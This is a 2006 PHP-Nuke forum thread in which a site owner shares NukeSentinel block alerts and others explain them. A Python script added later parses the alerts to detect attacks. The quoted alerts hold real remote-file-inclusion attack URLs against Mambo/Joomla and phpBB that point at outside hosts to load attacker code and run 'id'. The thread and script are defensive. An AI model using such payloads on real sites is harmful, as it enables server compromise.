Ravens PHP Scripts: Forums
 

 

death_dream
Hangin' Around



Joined: Aug 10, 2006
Posts: 38

Posted: Mon Aug 14, 2006 3:07 am

It's been two days now since I installed Nuke Sentinel on my site and it's already caught one guy. :D

This is what the email said:
Code:
Date & Time: 2006-08-13 22:59:25 NDT GMT -0230

Blocked IP: 85.98.82.217
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: ddream.hostingposts.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Get String: ddream.hostingposts.com/index.php?_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Post String: ddream.hostingposts.com/index.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.82.217
Remote Port: 12876
Request Method: GET


What was he trying to do?

~Death Dream~
 
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

Posted: Mon Aug 14, 2006 7:09 am

Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! :clap:

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Mon Aug 14, 2006 9:22 am

It seems to be an attack against Mambo or Joomla systems. Probably a hacking robot script.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
death_dream







Posted: Mon Aug 14, 2006 9:49 am

montego wrote:
Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! :clap:


:clap: Even if you tried the URL you would get banned, right?

~Death Dream~
 
montego







Posted: Mon Aug 14, 2006 7:25 pm

I don't mean trying out the URL on my own site... ;) What I meant was to try and download what this joker is trying to do in the embedded URI.
 
death_dream







Posted: Tue Aug 15, 2006 2:32 am

I see.

~Death Dream~
 
death_dream







Posted: Tue Aug 15, 2006 6:44 am

Got 2!

Code:
Date & Time: 2006-08-15 08:20:40 NDT GMT -0230

Blocked IP: 86.107.102.26
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Get String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Post String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 86.107.102.26
Remote Port: 2062
Request Method: GET


Any idea on this one?
 
gregexp
The Mouse Is Extension Of Arm



Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

Posted: Tue Aug 15, 2006 9:19 am

phpBB root path exploit.
Sentinel stops these and it's doing its job.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
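
Added example, not part of the original thread and not NukeSentinel's own code: a small Python triage script that parses alert e-mails in the layout posted above and labels why a query string was hostile, namely a parameter whose value is a remote URL (the mosConfig_absolute_path and phpbb_root_path cases) and parameters named after PHP superglobals. The sample alerts, IPs and host names are constructed placeholders, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Parameter names that collide with PHP superglobals (first alert: _REQUEST, GLOBALS).
SUPERGLOBALS = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE",
                "_SERVER", "_FILES", "_ENV", "_SESSION"}
# A parameter whose value is itself a URL is the remote-include pattern.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample alerts in the e-mail layout shown in the thread;
# IPs and host names are documentation placeholders, not values from the page.
SAMPLE_ALERTS = [
    "Blocked IP: 192.0.2.10\nReason: Abuse-Filter\n"
    "Query String: site.example/index.php?_REQUEST=&_REQUEST[option]=com_content"
    "&GLOBALS=&mosConfig_absolute_path=http://remote.example/payload?\n"
    "Request Method: GET",
    "Blocked IP: 192.0.2.20\nReason: Abuse-Filter\n"
    "Query String: site.example/modules/Forums/admin/admin_styles.php"
    "?phpbb_root_path=http%3A%2F%2Fremote.example/0.txt?\n"
    "Request Method: GET",
]


def parse_alert(text):
    """Turn the 'Key: value' lines of one alert e-mail into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def classify(alert_text):
    """Return (blocked_ip, findings) where findings are (label, parameter) pairs."""
    fields = parse_alert(alert_text)
    _, _, query = fields.get("Query String", "").partition("?")
    findings = []
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]  # _REQUEST[option] -> _REQUEST
        if base in SUPERGLOBALS:
            findings.append(("superglobal-overwrite", name))
        if REMOTE_URL.match(value):
            findings.append(("remote-include", name))
    return fields.get("Blocked IP"), findings


if __name__ == "__main__":
    for alert in SAMPLE_ALERTS:
        print(classify(alert))
```
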
death_dream







Posted: Tue Aug 15, 2006 11:32 am

Excellent. Should I update my phpBB then as well? I'm using 2.0.18

~Death Dream~
 
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6432

Posted: Tue Aug 15, 2006 3:42 pm

First, put admin authentication on the modules/Forums/admin directory. 2.0.19 is good, but there is some debate about 2.0.20.

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
death_dream







Posted: Wed Aug 16, 2006 2:54 am

K, I will put admin authentication on. But could you tell me how it works before I find myself to the point that I can't log in lol.

Also I put block proxies on strong level, So what does "Default Page" mean?

~Death Dream~
 
montego







Posted: Wed Aug 16, 2006 6:51 am

Quote:

Also I put block proxies on strong level, So what does "Default Page" mean?

It simply means that when the attack is caught, it will display the default blocker page that came with NS... NS allows you to create your own if you would rather not use what is provided. However, I kind of like the "in your face" page that is provided... :lol:
 
death_dream







Posted: Wed Aug 16, 2006 7:59 am

I installed PC killer on it.

~Death Dream~
 
montego







Posted: Thu Aug 17, 2006 5:31 am

Well, that is far more "in your face" than the default blocker pages. ROTFL
 
death_dream







Posted: Thu Aug 17, 2006 6:04 am

montego wrote:
Well, that is far more "in your face" than the default blocker pages. ROTFL


That's what I want :D

~Death Dream~
 
utssace
Worker



Joined: Feb 18, 2006
Posts: 155
Location: Virginia

Posted: Tue Aug 22, 2006 5:16 pm

How do you turn on admin authentication for the forum? I have it turned on for admin access to the site (config.php).
 
montego







Posted: Wed Aug 23, 2006 7:05 am

It is not a NukeSentinel thing. See this:
[ Only registered users can see links on this board! Get registered or login! ]
 
All times are GMT - 6 Hours